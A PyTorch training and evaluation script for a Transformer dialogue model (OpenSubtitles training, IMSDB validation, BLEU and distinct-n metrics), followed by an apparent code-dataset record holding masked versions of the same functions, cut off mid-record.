        decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)
        out_seqs = torch.argmax(decoder_output_probs, dim=2)
        # loss, scaled down so accumulated gradients sum to a full-batch step
        loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION
        loss.backward()
        total_loss += loss.item()
        # calculate metrics on the greedy argmax sequences
        bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)
        distinct_1_score += distinct_1(out_seqs, tgt_lens)
        distinct_2_score += distinct_2(out_seqs, tgt_lens)
        # summary writer (log the un-scaled loss)
        global_train_step += 1
        writer.log_loss(loss.item()*ACCUMULATION, mode='train')
        if (i+1) % ACCUMULATION == 0:
            # clip_grad_norm_(model.parameters(), max_norm=5)
            optimizer.step()
            optimizer.zero_grad()
            scheduler.step()
        if (i+1) % opt.logstep == 0:
            # NOTE(review): averages divide by opt.logstep but the metrics were
            # accumulated over opt.logstep iterations, so this matches only when
            # the counters are reset below — which they are.
            avg_loss = (total_loss / opt.logstep) * ACCUMULATION
            avg_bleu = bleu_score / opt.logstep
            avg_distinct_1 = distinct_1_score / opt.logstep
            avg_distinct_2 = distinct_2_score / opt.logstep
            mylogger.log(
                i, epoch, model, value=avg_loss, is_train=True,
                info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
            total_loss = 0.
            bleu_score = 0.
            distinct_1_score, distinct_2_score = 0., 0.
            show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')
def eval(epoch, model, dataloader, criterion, beam_size=2):
    """Evaluate one epoch with beam search (beam_size > 1) or greedy decoding.

    Writes every decoded sentence to ./save/<model_name>/<model_name>_<epoch>
    and logs averaged loss/BLEU/distinct-n.  NOTE: shadows the builtin
    `eval`; kept as-is because run_model() calls it by this name.
    """
    global global_valid_step
    model.eval()
    criterion.eval()
    total_loss = 0.
    bleu_score = 0.
    distinct_1_score, distinct_2_score = 0., 0.
    fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')
    with torch.no_grad():
        for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):
            # decoding starts from a single <bos> token
            tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)
            tgt_gold = tgt[:, 1:]
            if beam_size > 1:
                output_seqs, output_probs = model.beam_search(
                    src=src, tgt_begin=tgt_begin, src_length=src_lens,
                    eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())
            else:
                output_seqs, output_probs = model.greedy(
                    src=src, tgt_begin=tgt_begin, src_length=src_lens,
                    eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())
            # generated and gold lengths can differ; compare on the common prefix
            min_len = min(tgt_gold.shape[1], output_seqs.shape[1])
            # loss
            loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])
            total_loss += loss.item()
            # calculate metrics
            out_lens = [min_len]
            bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)
            distinct_1_score += distinct_1(output_seqs, out_lens)
            distinct_2_score += distinct_2(output_seqs, out_lens)
            # show sequence (batch size is assumed to be 1 here — output_seqs[0])
            global_valid_step += 1
            fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\n')
            if (i+1) % opt.logstep == 0:
                show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')
        # summary
        # NOTE(review): dividing by i (last 0-based index) rather than i+1
        # slightly overstates the averages; confirm whether this is intended.
        avg_loss = total_loss / i
        avg_bleu = bleu_score / i
        avg_distinct_1 = distinct_1_score / i
        avg_distinct_2 = distinct_2_score / i
        writer.log_loss(avg_loss, mode='valid')
        mylogger.log(
            i, epoch, model, value=avg_bleu, is_train=False,
            info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
    fout.close()
def run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):
    """Alternate one training pass and one evaluation pass for `niter` epochs."""
    mylogger.log_info('Running Model')
    for epoch_idx in range(niter):
        current_lr = optimizer.state_dict()["param_groups"][0]["lr"]
        mylogger.log_info(f'EPOCH: {epoch_idx}, lr: {current_lr}')
        train(epoch_idx, model, train_loader, criterion, optimizer, scheduler)
        eval(epoch_idx, model, eval_loader, criterion, beam_size=opt.beam)
def convert_ids_to_seq(id_seq, vocab_bulider):
    """Map each token id in `id_seq` to its word string via the vocab builder."""
    return list(map(vocab_bulider.id_to_word, id_seq))
def show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):
    """Decode a batch of (post, prediction, reference) id sequences and log them
    as text to the summary writer under `<mode>_post` / `_pred` / `_reps` tags.
    """
    batch = zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth)
    for in_id, out_id, out_len, gold_id in batch:
        post_seq = convert_ids_to_seq(in_id, vocab_bulider)
        # Keep only the generated prefix when a positive length is provided.
        pred_ids = out_id[:out_len] if out_len > 0 else out_id
        pred_seq = convert_ids_to_seq(pred_ids, vocab_bulider)
        gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)
        writer.add_text(tag=mode + '_post',
                        sentence=' '.join(post_seq[:get_index(post_seq, '<pad>')]),
                        global_step=step)
        writer.add_text(tag=mode + '_pred',
                        sentence=' '.join(pred_seq),
                        global_step=step)
        # NOTE(review): the reference is truncated at the *post* sequence's first
        # '<pad>' index (matches the original code) — confirm this is intended
        # rather than gold_seq's own pad position.
        writer.add_text(tag=mode + '_reps',
                        sentence=' '.join(gold_seq[:get_index(post_seq, '<pad>')]),
                        global_step=step)
if __name__ == '__main__':
    # Timestamp suffix keeps checkpoints/logs from concurrent runs distinct.
    begin_time = time.strftime("%H%M%S", time.localtime())
    model_name = 'transformer' + begin_time
    opt = parse_args()
    device = "cuda" if torch.cuda.is_available() else "cpu"
    if device == "cuda":
        # Guard: torch.cuda.set_device raises on a CPU-only machine.
        torch.cuda.set_device(opt.gpuid)
    init_seed(opt.manualSeed)
    # Gradient-accumulation factor: effective batch = realbatch * ACCUMULATION.
    ACCUMULATION = opt.batchsize // opt.realbatch

    mylogger = LogManager(checkpoint_step=10,
                          save_dir='./save',
                          model_name=model_name,
                          log_file_name=model_name + '.log',
                          mode='max', device=device)
    mylogger.save_args(opt)
    writer = SummaryHelper(save_dir='./save', model_name=model_name)

    train_data_dir = './data/opensubtitles'
    # train_data_dir = './data/wmt15en-de'

    vocab_file_list = ['dialogue_length3_6.post']
    # vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']
    vocab_bulider = VocabBulider(
        train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,
        vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)
    print('most common 50:', vocab_bulider.most_common(50))
    mylogger.log_info('vocab size: %d' % len(vocab_bulider))

    # metrics
    bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)
    distinct_1 = DistinctNGram(ngram=1)
    distinct_2 = DistinctNGram(ngram=2)

    # train dataset and dataloader
    if opt.cotk:  # use dataset in paper 'cotk'
        # opensub_file_name_list = ['all_de-en.bpe']
        opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']
        unk_token = None
    else:  # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'
        opensub_file_name_list = ['dialogue_length3_6']
        unk_token = 'UNknown'
    opensub_dataset = OpenSubDataset(
        data_dir=train_data_dir, vocab_bulider=vocab_bulider,
        # BUG FIX: pass the branch-selected unk_token. It was previously
        # hard-coded to 'UNknown', which silently ignored the opt.cotk branch
        # (where unk_token is None) and left the variable above dead.
        file_name_list=opensub_file_name_list, unk_token=unk_token,
        save_process=False, samples=opt.trainsamples, add_bos=True, add_eos=True)
    print(opensub_dataset.sample())
    opensub_dataloader = DataLoader(
        opensub_dataset, batch_size=opt.realbatch,
        collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
        shuffle=True, num_workers=opt.workers, drop_last=True)

    # dev set (batch_size=1: eval decodes one dialogue at a time)
    dev_data_dir = './data/imsdb'
    imsdb_file_name_list = ['imsdb_lower']
    # dev_data_dir = './data/wmt15en-de'
    # imsdb_file_name_list = ['newstest']
    imsdb_dataset = IMSDBDataset(
        data_dir=dev_data_dir, vocab_bulider=vocab_bulider,
        file_name_list=imsdb_file_name_list, save_process=False,
        samples=opt.validsamples, add_bos=True, add_eos=True)
    print(imsdb_dataset.sample())
    imsdb_dataloader = DataLoader(
        imsdb_dataset, batch_size=1,
        collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
        shuffle=False, num_workers=opt.workers, drop_last=True)

    # model definition: custom Transformer vs the torch.nn-based variant
    # (they differ only in use_tgt_mask below).
    if opt.mine:
        model = Transformer(
            ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
            num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
            dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
            use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,
            activation='relu', use_vocab_attn=False, use_pos_attn=False,
            relative_clip=0, highway=False, device=device, max_sent_length=32,
            share_input_output_embedding=False, share_encoder_decoder_embedding=True,
            share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
    else:
        model = TransformerTorch(
            ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
            num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
            dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
            use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,
            activation='relu', use_vocab_attn=False, use_pos_attn=False,
            relative_clip=0, highway=False, device=device, max_sent_length=32,
            share_input_output_embedding=False, share_encoder_decoder_embedding=True,
            share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
    model.show_graph()
    if opt.half:
        model = model.half()
    if opt.ft:
        # Fine-tune: restore the best checkpoint saved under opt.ckpt.
        model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)

    # optimizer and scheduler
    if opt.warmup:
        # lr=1 so the LambdaLR multiplier *is* the learning rate.
        optimizer = RAdam(
            filter(lambda p: p.requires_grad, model.parameters()),
            lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)
        rate_ratio = 1. / math.sqrt(opt.embedsize)
        # Noam-style schedule: top lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step.
        scheduler = optim.lr_scheduler.LambdaLR(
            optimizer,
            lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))
    else:
        optimizer = RAdam(
            filter(lambda p: p.requires_grad, model.parameters()),
            lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,
            weight_decay=opt.weight_decay)
        scheduler = optim.lr_scheduler.StepLR(
            optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)

    # loss function
    # criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid)  # for Transformer
    criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)

    # run model
    global_train_step, global_valid_step = 0, 0
    run_model(
        model, opensub_dataloader, imsdb_dataloader,
        opt.niter, criterion, optimizer, scheduler)
    writer.close()
|
normal
|
{
"blob_id": "bc6c3383684cbba775d17f81ead3346fe1a01f90",
"index": 5102,
"step-1": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\n<mask token>\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: 
{optimizer.state_dict()['param_groups'][0]['lr']}\"\n )\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\n<mask token>\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = 
open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n 
)\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\n<mask token>\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = 
open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n 
)\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\ndef convert_ids_to_seq(id_seq, vocab_bulider):\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = 
open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: 